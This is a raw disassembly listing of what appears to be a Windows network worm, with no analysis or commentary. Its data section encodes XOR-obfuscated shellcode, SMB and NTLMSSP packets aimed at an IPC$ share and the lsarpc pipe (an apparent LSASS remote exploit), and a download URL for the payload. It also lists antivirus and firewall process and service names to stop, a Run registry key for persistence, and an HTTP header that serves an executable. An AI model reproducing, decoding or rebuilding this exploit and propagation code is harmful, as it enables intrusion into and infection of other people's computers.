sub_4408CD proc near ; CODE XREF: .data:0043F227�p
jmp dword ptr ds:loc_405367+1
sub_4408CD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408D9 proc near ; CODE XREF: .data:0043FE36�p
; .data:0043FE70�p ...
jmp dword ptr ds:loc_40536C
sub_4408D9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408E5 proc near ; CODE XREF: .data:0043F252�p
jmp dword ptr ds:loc_40536D+3
sub_4408E5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408F1 proc near ; CODE XREF: sub_43F74D+B2�p
; sub_43F74D+D0�p ...
jmp dword ptr ds:loc_405372+2
sub_4408F1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408FD proc near ; CODE XREF: sub_43F74D+16D�p
; sub_43F74D+2E4�p ...
jmp dword ptr ds:loc_405375+3
sub_4408FD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440909 proc near ; CODE XREF: .data:0043F1A8�p
jmp dword ptr ds:loc_40537B+1
sub_440909 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440915 proc near ; CODE XREF: sub_43F64C:loc_43F675�p
; sub_43F64C:loc_43F6CF�p ...
jmp dword ptr ds:loc_405380
sub_440915 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440921 proc near ; CODE XREF: .data:0043F161�p
; .data:0043F17B�p ...
jmp dword ptr ds:loc_405383+1
sub_440921 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44092D proc near ; CODE XREF: .data:0043F467�p
; sub_43F64C+F4�p ...
jmp dword ptr ds:loc_405388
sub_44092D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440939 proc near ; CODE XREF: .data:0043FDFA�p
jmp dword ptr ds:loc_40538C
sub_440939 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440945 proc near ; CODE XREF: sub_43F261+6B�p
; sub_43F261+8E�p ...
jmp dword ptr ds:loc_40538E+2
sub_440945 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440951 proc near ; CODE XREF: sub_440625+17�p
jmp dword ptr ds:loc_405393+1
sub_440951 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44095D proc near ; CODE XREF: .data:0043F418�p
; .data:0043F434�p
jmp dword ptr ds:loc_405398
sub_44095D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 17h dup(0)
dd 40300000h, 40311000h, 800000h, 22h dup(0)
dd 5000h, 0
dd 34303400h, 746F4E20h, 756F6620h, 2900646Eh, 0D960413Ah
dd 170A0705h, 27251F1Bh, 2AC9C5ACh, 0DF7F5F3Ch, 746845EBh
dd 2F3A7074h, 3732312Fh, 2 dup(3030302Eh), 3130302Eh, 3030303Ah
dd 662F3038h, 0AEAE6273h, 335DAE62h, 0A0B966C9h, 5758D01h
dd 68AFE8Bh, 575993Ch, 2C068A46h, 99344630h, 0E2470788h
dd 0E80AEBEDh, 0FFFFFFDAh, 99999999h, 41E41499h, 0C9994671h
dd 0C999C999h, 712FE414h, 99C9994Eh, 0F3C999C9h, 0C999F19Dh
dd 99C99989h, 0C999F1C9h, 999CC999h, 0C999F3C9h, 99988B71h
dd 67C999C9h, 10F0E3F3h, 9998931Ch, 0F3C999C9h, 414C999h
dd 0C999989Bh, 71CAC999h, 99C99963h, 0BC999C9h, 10A7C196h
dd 0C999671Ch, 0C999C999h, 9666611Ah, 0C999091Dh, 0C999C999h
dd 0C8C850B2h, 1498F3C8h, 71C941DCh, 99C99936h, 4EC999C9h
dd 1291C0A4h, 0ED599249h, 0C959B2EFh, 14C9C9C9h, 0CBCA2FC4h
dd 0C9990C71h, 0C999C999h, 21E424FFh, 0C7ED5992h, 99F1CDCDh
dd 9CC999C9h, 2C66C999h, 0C9999893h, 71C9C999h, 99C999E3h
dd 0FBC999C9h, 6683B8B0h, 9998932Ch, 66C999C9h, 0C999672Ch
dd 0C999C999h, 0C9991471h, 0C999C999h, 0E7C29C9Bh, 99672C66h
dd 99C999C9h, 99E771C9h, 99C999C9h, 31F1AC9h, 149CF3A4h
dd 99989B04h, 0CAC999C9h, 0C999F571h, 0C999C999h, 7126F434h
dd 71C998F3h, 99C999F9h, 77C999C9h, 14865973h, 496624D4h
dd 0C999CB71h, 0C999C999h, 0EF133BF9h, 0A13729F9h, 0DE9AED9Eh
dd 9E5F6072h, 5AF8C999h, 0C999A9C1h, 2 dup(0C999C999h)
dd 0B7FBEAFFh, 99FCE1FCh, 4 dup(99C999C9h), 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998971Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FDC65A91h, 0C6EAFAh
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 53FFA400h, 73424Dh, 18000000h, 0C807h, 3 dup(0)
dd 0FEFFh, 0FF0C0010h, 400A400h, 0A11h, 0
dd 2000h, 0D4000000h, 69800000h, 4C544E00h, 5053534Dh
dd 100h, 8829700h, 0E0h, 3 dup(0)
dd 570000h, 6E0069h, 6F0064h, 730077h, 320020h, 300030h
dd 200030h, 310032h, 350039h, 570000h, 6E0069h, 6F0064h
dd 730077h, 320020h, 300030h, 200030h, 2E0035h, 30h, 0
dd 0FFDA0000h, 73424D53h, 0
dd 0C80718h, 3 dup(0)
dd 0FEFF00h, 0C002008h, 0DA00FFh, 0A1104h, 0
dd 570000h, 0
dd 800000D4h, 544E009Fh, 53534D4Ch, 30050h, 10000h, 460001h
dd 0
dd 470000h, 0
dd 400000h, 0
dd 400000h, 60000h, 400006h, 100000h, 470010h, 8A150000h
dd 48E088h, 44004Fh, 6A198100h, 49E4F27Ah, 30AF281Ch, 67107425h
dd 69005753h, 64006E00h, 77006F00h, 20007300h, 30003200h
dd 30003000h, 32002000h, 39003100h, 3500h, 69005700h, 64006E00h
dd 77006F00h, 20007300h, 30003200h, 30003000h, 35002000h
dd 30002E00h, 2 dup(0)
dd 53FF5C00h, 75424Dh, 18000000h, 0C807h, 3 dup(0)
dd 800FEFFh, 0FF040030h, 8005C00h, 31000100h, 5C0000h
dd 31005Ch, 320039h, 31002Eh, 380036h, 31002Eh, 32002Eh
dd 300031h, 49005Ch, 430050h, 24h, 3F3F3F3Fh, 3Fh, 0FF640000h
dd 0A2424D53h, 0
dd 0C80718h, 3 dup(0)
dd 4DC08h, 18004008h, 0DEDE00FFh, 16000E00h, 0
dd 9F000000h, 201h, 2 dup(0)
dd 3000000h, 1000000h, 40000000h, 2000000h, 3000000h, 5C000011h
dd 73006C00h, 72006100h, 63007000h, 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0C000000h
dd 4D53FFF4h, 2542h, 7180000h, 0C8h, 2 dup(0)
dd 0DC080000h, 60080004h, 1000h, 0CA0h, 400h, 2 dup(0)
dd 540000h, 540CA0h, 260002h, 0CB14000h, 50005C10h, 50004900h
dd 5C004500h, 0
dd 500h, 1003h, 0CA000h, 100h, 0C8800h, 9000000h, 3EC00h
dd 0
dd 3EC00h, 14950000h, 30040h, 707C0000h, 10040h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 85780000h, 5BAB0013h, 0E9A6h, 0FFF81000h, 2F424D53h
dd 0
dd 0C80718h, 3 dup(0)
dd 0FEFF08h, 0E006008h, 0DEDE00FFh, 4000h, 0FFFF0000h
dd 8FFFFh, 10B8h, 4010B8h, 0
dd 5EE10B9h, 10010000h, 0B8000000h, 1000010h, 0C000000h
dd 20h, 0AD000900h, 0Dh, 0AD000000h, 0Dh, 0D80F0000h, 424D53FFh
dd 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 10h dup(0)
dd 460000h, 101h, 0Dh dup(0)
dd 15123C00h, 275h, 0Dh dup(0)
dd 1C123C00h, 75h, 0Eh dup(0)
dd 0EC816600h, 0E4FF071Ch, 100h, 404CF700h, 404CE900h
dd 200h, 180h, 404CF700h, 404CE000h, 100h, 180h, 404CF700h
dd 404CCF00h, 200h, 80h, 0
dd 404CB500h, 0
dd 404C9C00h, 2 dup(0)
dd 404C8C00h, 2 dup(0)
dd 404C8200h, 2 dup(0)
dd 404C6900h, 2 dup(0)
dd 404C5000h, 2 dup(0)
dd 404C4300h, 2 dup(0)
dd 404C3300h, 100h, 0
dd 404C2C00h, 100h, 4049F800h, 404C2400h, 100h, 0
dd 404C1900h, 2 dup(0)
dd 404C1200h, 100h, 0
dd 404C0C00h, 100h, 0
dd 404C0300h, 100h, 0
dd 404BFC00h, 100h, 0
dd 404BF300h, 100h, 0
dd 404BEC00h, 100h, 0
dd 404BE500h, 100h, 0
dd 404BDD00h, 100h, 0
dd 404BD700h, 100h, 404A0800h, 404BD000h, 100h, 0
dd 404BC800h, 100h, 0
dd 404BC100h, 100h, 0
dd 404BBB00h, 100h, 0
dd 404BB200h, 100h, 404A1800h, 404BAD00h, 100h, 0
dd 404BA800h, 100h, 404A2800h, 404BA200h, 100h, 0
dd 524F5700h, 6669004Dh, 6F530063h, 61777466h, 4D5C6572h
dd 6F726369h, 74666F73h, 6E69575Ch, 73776F64h, 6B005C00h
dd 6469706Ch, 706C6B00h, 6C6B0066h, 76006669h, 74616473h
dd 746E61h, 6F6D7376h, 6D6B006Eh, 78627378h, 786D6B00h
dd 7369646Eh, 786D6B00h, 736469h, 66786D6Bh, 6D6B0077h
dd 6C696678h, 6D6B0065h, 67666378h, 786D6B00h, 676962h
dd 61786D6Bh, 746E6567h, 786D5500h, 676643h, 41786D55h
dd 746E6567h, 786D5500h, 5500554Ch, 6F50786Dh, 6D53006Ch
dd 72655363h, 65636976h, 69667300h, 7265746Ch, 736E6C00h
dd 317766h, 7074754Fh, 4674736Fh, 77657269h, 6C6C61h, 72616873h
dd 63616465h, 73736563h, 41634D00h, 20656566h, 6D617246h
dd 726F7765h, 6553206Bh, 63697672h, 65440065h, 74636574h
dd 6420726Fh, 664F2065h, 65636966h, 6E616353h, 5A00544Eh
dd 41656E6Fh, 6D72616Ch, 6E615000h, 41206164h, 7669746Eh
dd 73757269h, 726F4E00h, 206E6F74h, 69746E41h, 75726976h
dd 65532073h, 63697672h, 614B0065h, 72657073h, 20796B73h
dd 69746E41h, 6361482Dh, 2E72656Bh, 6B6E6Ch, 656E6F5Ah
dd 62614C20h, 6C432073h, 746E6569h, 6F4D4100h, 6F74696Eh
dd 6F4C0072h, 27206B6Fh, 5320276Eh, 706F74h, 54464F53h
dd 45524157h, 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h
dd 435C7377h, 65727275h, 6556746Eh, 6F697372h, 75525C6Eh
dd 78006Eh, 253A7325h, 31002F75h, 312E3239h, 252E3836h
dd 75252E75h, 32373100h, 2E75252Eh, 252E7525h, 30310075h
dd 2E75252Eh, 252E7525h, 6EB0075h, 5C0006EBh, 5C73255Ch
dd 24637069h, 2E752500h, 252E7525h, 75252E75h, 54544800h
dd 2E312F50h, 30322031h, 4B4F2030h, 0A0D0A0Dh, 43000A0Dh
dd 65746E6Fh, 4C2D746Eh, 74676E65h, 25203A68h, 0D0A0D75h
dd 5448000Ah, 312F5054h, 3220312Eh, 4F203030h, 430A0D4Bh
dd 65746E6Fh, 542D746Eh, 3A657079h, 70706120h, 6163696Ch
dd 6E6F6974h, 652D782Fh, 632D6578h, 72706D6Fh, 65737365h
dd 0A0D64h, 787878h, 544547h, 300050h, 6 dup(0)
dd 50F400h, 2 dup(0)
dd 57F400h, 524C00h, 513800h, 2 dup(0)
dd 583C00h, 529000h, 514400h, 2 dup(0)
dd 584C00h, 529C00h, 515000h, 2 dup(0)
dd 585C00h, 52A800h, 51AC00h, 2 dup(0)
dd 58C000h, 530400h, 51D800h, 2 dup(0)
dd 58F000h, 533000h, 520C00h, 2 dup(0)
dd 592C00h, 536400h, 1Ah dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 2 dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 0
dd 57003000h, 74534153h, 75747261h, 70h, 61003500h, 70656363h
dd 74h, 62003600h, 646E69h, 63003700h, 65736F6Ch, 6B636F73h
dd 7465h, 63003800h, 656E6E6Fh, 7463h, 67003B00h, 6F687465h
dd 79627473h, 656D616Eh, 67003C00h, 6F687465h, 616E7473h
dd 656Dh, 68004600h, 736E6F74h, 69004700h, 5F74656Eh, 72646461h
dd 69004900h, 5F74656Eh, 616F746Eh, 6C004B00h, 65747369h
dd 6Eh, 72004F00h, 766365h, 73005500h, 646E65h, 73005900h
dd 64747568h, 6E776Fh, 73005A00h, 656B636Fh, 74h, 49008100h
dd 7265746Eh, 4774656Eh, 6F437465h, 63656E6Eh, 53646574h
dd 65746174h, 53004F00h, 74654748h, 63657053h, 466C6169h
dd 65646C6Fh, 74615072h, 4168h, 45008200h, 54746978h, 61657268h
dd 64h, 4700CA00h, 6F437465h, 6E616D6Dh, 6E694C64h, 4165h
dd 4700DE00h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 6449h, 4700F800h, 69467465h, 6953656Ch, 657Ah, 47010C00h
dd 6F4D7465h, 656C7564h, 646E6148h, 41656Ch, 43001B00h
dd 65736F6Ch, 646E6148h, 656Ch, 47015500h, 69547465h, 6F436B63h
dd 746E75h, 47015C00h, 65567465h, 6F697372h, 6Eh, 47016800h
dd 61626F6Ch, 6464416Ch, 6D6F7441h, 41h, 49019200h, 7265746Eh
dd 6B636F6Ch, 78456465h, 6E616863h, 6567h, 49019400h, 7265746Eh
dd 6B636F6Ch, 6E496465h, 6D657263h, 746E65h, 4C01AD00h
dd 6C61636Fh, 6F6C6C41h, 63h, 43003100h, 74616572h, 6C694665h
dd 4165h, 5201FA00h, 46646165h, 656C69h, 52020E00h, 6E556C74h
dd 646E6977h, 52020F00h, 655A6C74h, 654D6F72h, 79726F6Dh
dd 53026400h, 7065656Ch, 6C02C600h, 63727473h, 416E7970h
dd 6C02C900h, 6C727473h, 416E65h, 43004700h, 74616572h
dd 72685465h, 646165h, 44005400h, 74656C65h, 6C694665h
dd 4165h, 5300FE00h, 69547465h, 72656Dh, 52000200h, 73696765h
dd 43726574h, 7373616Ch, 41h, 47002000h, 654D7465h, 67617373h
dd 4165h, 54002400h, 736E6172h, 6574616Ch, 7373654Dh, 656761h
dd 44002500h, 61707369h, 4D686374h, 61737365h, 416567h
dd 50003D00h, 5174736Fh, 4D746975h, 61737365h, 6567h, 43004F00h
dd 74616572h, 6E695765h, 45776F64h, 4178h, 44005100h, 72747365h
dd 6957796Fh, 776F646Eh, 44005B00h, 69576665h, 776F646Eh
dd 636F7250h, 41h, 4300BF00h, 65736F6Ch, 76726553h, 48656369h
dd 6C646E61h, 65h, 4300C000h, 72746E6Fh, 65536C6Fh, 63697672h
dd 65h, 4400C300h, 74656C65h, 72655365h, 65636976h, 4F00D100h
dd 536E6570h, 6E614D43h, 72656761h, 41h, 4F00D300h, 536E6570h
dd 69767265h, 416563h, 52016700h, 65446765h, 6574656Ch
dd 756C6156h, 4165h, 52017100h, 72436765h, 65746165h, 4579654Bh
dd 4178h, 52017400h, 6C436765h, 4B65736Fh, 7965h, 52017900h
dd 704F6765h, 654B6E65h, 41784579h, 52018400h, 75516765h
dd 56797265h, 65756C61h, 417845h, 52019000h, 65536765h
dd 6C615674h, 78456575h, 41h, 5F00E800h, 616F7469h, 5F001800h
dd 7465475Fh, 6E69614Dh, 73677241h, 5F018100h, 65656C73h
dd 70h, 65020A00h, 746978h, 6D025400h, 70636D65h, 79h
dd 6D025600h, 65736D65h, 74h, 72026000h, 65736961h, 72026100h
dd 646E61h, 73026A00h, 616E6769h, 6Ch, 73026D00h, 6E697270h
dd 6674h, 73026F00h, 646E6172h, 73027100h, 61637274h, 74h
dd 73027200h, 68637274h, 72h, 73028000h, 74737274h, 72h
dd 6F737700h, 32336B63h, 6C6C642Eh, 0Fh dup(40500000h)
dd 4E495700h, 54454E49h, 4C4C442Eh, 40501400h, 45485300h
dd 32334C4Ch, 4C4C442Eh, 40502800h, 52454B00h, 334C454Eh
dd 4C442E32h, 4Ch, 15h dup(40503C00h), 45535500h, 2E323352h
dd 4C4C44h, 9 dup(40505000h), 56444100h, 33495041h, 4C442E32h
dd 4Ch, 0Bh dup(40506400h), 54524300h, 2E4C4C44h, 4C4C44h
dd 0Eh dup(40507800h), 25h dup(0)
dd 2000h, 0
dd 2000h, 100000h, 2A0000h, 300000h, 480000h
db 2 dup(0)
a6Df db '6~dF',0 ; DATA XREF: sub_403A7B+19�o
aU db 'U#',0 ; DATA XREF: sub_403A7B+2C�o
aN db 'N |$',0 ; DATA XREF: sub_403A7B+3F�o
aWdg db 'wD ',0 ; DATA XREF: sub_403B8E+17�o
aQ85o db 'Q/85O',0 ; DATA XREF: sub_403B8E+3B�o
dword_4421FE dd 252425h word_442202 dw 5A4Dh ; DATA XREF: sub_403B8E+7F�o
db 0
a4kzsb db '4kzsB',0 ; DATA XREF: sub_403B8E+9E�o
aOmy db 'OmY ',0 ; DATA XREF: sub_403B8E+ED�o
aK db '%K',0 ; DATA XREF: sub_403B8E+10B�o
aGiyA9 db 'Iy~9',0 ; DATA XREF: sub_403B8E+14F�o
aIwKa db 'IW',27h,' KA',0 ; DATA XREF: sub_403D18+17�o
aR6 db 'R6',0 ; DATA XREF: sub_403D18+127�o
dword_442224 dd 273D45h aZ0lnyh? db 'Z0LNYh?',0 ; DATA XREF: sub_403D18+162�o
aVb6l db 'v6l',0 ; DATA XREF: sub_403D18+170�o
aEa0I db 'Ea#0 I',0 ; DATA XREF: sub_403D18:loc_404021�o
aN_0 db 'N,',0 ; DATA XREF: sub_40409A+1A�o
byte_44223F db 0 ; DATA XREF: sub_4040BF+50�o
dd 7, 0Bh
dword_442248 dd 8Ah ; sub_404129:loc_404156�r ...
aGxK_0 db 'gx%K',0 ; DATA XREF: sub_4041B6+16�o
aJ db '&j',0 ; DATA XREF: sub_4041B6+29�o
aLkw_0 db 27h,'lkW',0 ; DATA XREF: sub_4041B6+3C�o
byte_442259 db 3 dup(0) ; DATA XREF: sub_40439D+BB�o
dd 6, 0Fh
dword_442264 dd 0 ; .text:loc_40449E�r ...
dword_442268 dd 0 ; sub_404502+36�r ...
dd 8, 10h
dword_442274 dd 0 ; sub_4045EF:loc_4045EA�r ...
a@rva2g db '|@rVA2g',0 ; DATA XREF: sub_404657+15�o
aAsfA db 'SF=',0 ; DATA XREF: sub_404657+2F�o
a1 db ' 1',0 ; DATA XREF: sub_404657+43�o
aLw db '&:; lw',0 ; DATA XREF: sub_40470D+20F�o
dword_442290 dd 7A556Fh aDQA db 'd~q <a',0 ; DATA XREF: sub_404970+6D�o
dword_44229B dd 6E422Ah aHs db ' hS ',0 ; DATA XREF: sub_404BA0+DF�o
byte_4422A4 db 0 ; DATA XREF: sub_404D86+6�o
aOVunh db 'O+Vunh',0 ; DATA XREF: sub_404DE3+24�o
aXC6l db ' X c6L=',0 ; DATA XREF: sub_404DE3+14B�o
dd 4
dword_4422B8 dd 0Bh ; sub_4051C3+53�r
dword_4422BC dd 0 ; sub_404F63:loc_404F98�r ...
word_4422C0 dw 20h ; DATA XREF: sub_405004+54�r
aG84rg db 'G84rg',0 ; DATA XREF: sub_405004+A5�o
dword_4422C8 dd 2 dword_4422CC dd 0Eh ; sub_405636+135�r ...
dword_4422D0 dd 0 ; sub_40525E:loc_40528C�r ...
dword_4422D4 dd 0 aJ3C7 db 'j~3 c7',0 ; DATA XREF: sub_4052F4:loc_405300�o
word_4422E0 dw 38h ; DATA XREF: sub_4052F4:loc_405308�r
aI db ';i ',27h,'&',0 ; DATA XREF: sub_4052F4:loc_405375�o
a4ct db ',4Ct',0 ; DATA XREF: sub_40538B+1B�o
word_4422ED dw 35h ; DATA XREF: sub_40538B+E5�r
a?I db '?<I*',0 ; DATA XREF: sub_405559+C�o
byte_4422F4 db 0 ; DATA XREF: sub_405636+16�o
dword_4422F5 dd 3C4731h byte_4422F9 db 49h, 7Fh, 59h ; DATA XREF: sub_405636+FA�o
dd 482153h
byte_442300 db 0 ; DATA XREF: sub_405636+1FD�o
byte_442301 db 0 ; DATA XREF: sub_405636+243�o
word_442302 dw 55h ; DATA XREF: sub_405636+273�r
a8_V9t db '8_|9t',0 ; DATA XREF: sub_405636+2ED�o
aAblx db 'BLX',0 ; DATA XREF: sub_405636+3BC�o
aYeqbi db ' YeQI',0 ; DATA XREF: sub_405636+4D9�o
dword_442317 dd 6B5521h aB@wfed0 db '@WFed0',0 ; DATA XREF: sub_405F5E+1B�o
aKPo db 'k`Po',0 ; DATA XREF: sub_405F5E+29�o
dword_442328 dd 4D2E41h byte_44232C db 0 ; DATA XREF: sub_405F5E+21F�o
aLO5 db 'L-o-5 ',0 ; DATA XREF: sub_4062A9+12�o
aYvlszz db 'yvlSzz',0 ; DATA XREF: sub_4062A9+33�o
word_44233B dw 65h ; DATA XREF: sub_4062A9+50�r
byte_44233D db 0 ; DATA XREF: sub_4062A9+E4�o
dword_44233E dd 3D5F81h word_442342 dw 4Fh ; DATA XREF: sub_4062A9+1FC�r
aXsc db '-<xSc ',0 ; DATA XREF: sub_4062A9+31C�o
aAD db 'A&$D',0 ; DATA XREF: sub_4062A9+3A1�o
a24f db '% 24f^$',0 ; DATA XREF: sub_4062A9+3FB�o
word_442358 dw 51h ; DATA XREF: sub_4062A9+463�r
aXvsRw db '|xs&RW',0 ; DATA XREF: sub_4062A9+532�o
word_442362 dw 2B75h ; DATA XREF: sub_4062A9+55B�o
dd 6B4B7F61h, 60h, 0
dword_442370 dd 0Ah dword_442374 dd 0 ; sub_40684E:loc_40687D�r ...
dword_442378 dd 0 ; sub_406A35+33�r ...
dword_44237C dd 0 ; sub_40692F+17�r ...
dword_442380 dd 0FFFFh ; sub_406A35+144�r ...
dword_442384 dd 744045h aVb_ db '$VB .',0 ; DATA XREF: sub_406A35+47�o
aMSD db 'M S^d/',0 ; DATA XREF: sub_406A35+83�o
aJz db 'JZ',0 ; DATA XREF: sub_406A35+10E�o
a?alV db '?l / ',0 ; DATA XREF: sub_406A35+12B�o
byte_4423A0 db 0 ; DATA XREF: sub_406A35+156�o
a_vY db '.=#y',0 ; DATA XREF: sub_406A35+23A�o
dword_4423A7 dd 207724h aNhRq db ' nH rQ',0 ; DATA XREF: sub_406A35+2AB�o
align 4
dword_4423B4 dd 7 ; sub_406D91+F94�r ...
dword_4423B8 dd 12h dword_4423BC dd 0 ; sub_406CF9:loc_406D27�r ...
dword_4423C0 dd 1 ; sub_407FE2+25�o
byte_4423C4 db 0 ; DATA XREF: sub_406D91+1069�r
align 2
byte_4423C6 db 0 ; DATA XREF: sub_406D91+2B�o
a6uxb6 db '6Ux6',0 ; DATA XREF: sub_406D91+18A�o
aTro_ db 'tRO,_',0 ; DATA XREF: sub_406D91+1A6�o
aVo4 db ' vo4|',0 ; DATA XREF: sub_406D91+226�o
byte_4423D9 db 0 ; DATA XREF: sub_406D91+23F�o
word_4423DA dw 37h ; DATA XREF: sub_406D91+24A�r
aAVy db 'a&vY',0 ; DATA XREF: sub_406D91+31A�o
word_4423E1 dw 4Eh ; DATA XREF: sub_406D91+418�r
byte_4423E3 db 7Ah ; DATA XREF: sub_406D91+445�o
db 77h, 0
byte_4423E6 db 0 ; DATA XREF: sub_406D91+460�o
aZa6Ca db 'zA6:c',0 ; DATA XREF: sub_406D91+49F�o
aFG db ' f>',0 ; DATA XREF: sub_406D91+5A3�o
dword_4423F4 dd 244870h dword_4423F8 dd 41437F4Ch db 0
dword_4423FD dd 572720h aJeth db 'jETH#',0 ; DATA XREF: sub_406D91+6E2�o
aKq db 'kQ',0 ; DATA XREF: sub_406D91+722�o
aGg db 'gG',27h,',',0 ; DATA XREF: sub_406D91+8A2�o
word_44240F dw 3Ch ; DATA XREF: sub_406D91+9AE�r
aEqf8 db 'EQf8',0 ; DATA XREF: sub_406D91+9C9�o
word_442416 dw 737Fh ; DATA XREF: sub_406D91+A9D�o
aEgcS db 'eC/S',0
byte_44241E db 0 ; DATA XREF: sub_406D91+AAB�o
dword_44241F dd 30617Ah word_442423 dw 83h ; DATA XREF: sub_406D91:loc_407988�r
byte_442425 db 0 ; DATA XREF: sub_406D91+C61�o
aJqs db '#JQS$ ',0 ; DATA XREF: sub_406D91+D7D�o
aH7a6 db 'h7A6/',0 ; DATA XREF: sub_406D91+DF2�o
aY db 'Y;',0 ; DATA XREF: sub_406D91+F20�o
word_442436 dw 0FFFFh ; DATA XREF: sub_407F34+5�o
dd 7FA8FFFFh, 7FB30040h
db 40h, 0
word_442442 dw 2D20h ; DATA XREF: sub_407FE2+41�o
db 0
aHS db 'H-S-',0 ; DATA XREF: .text:00408050�o
align 10h
dword_442450 dd 0Ah dword_442454 dd 0 ; sub_4080C5:loc_4080F4�r ...
a8fr8 db '8Fr8!#',0 ; DATA XREF: sub_40815F+DC�o
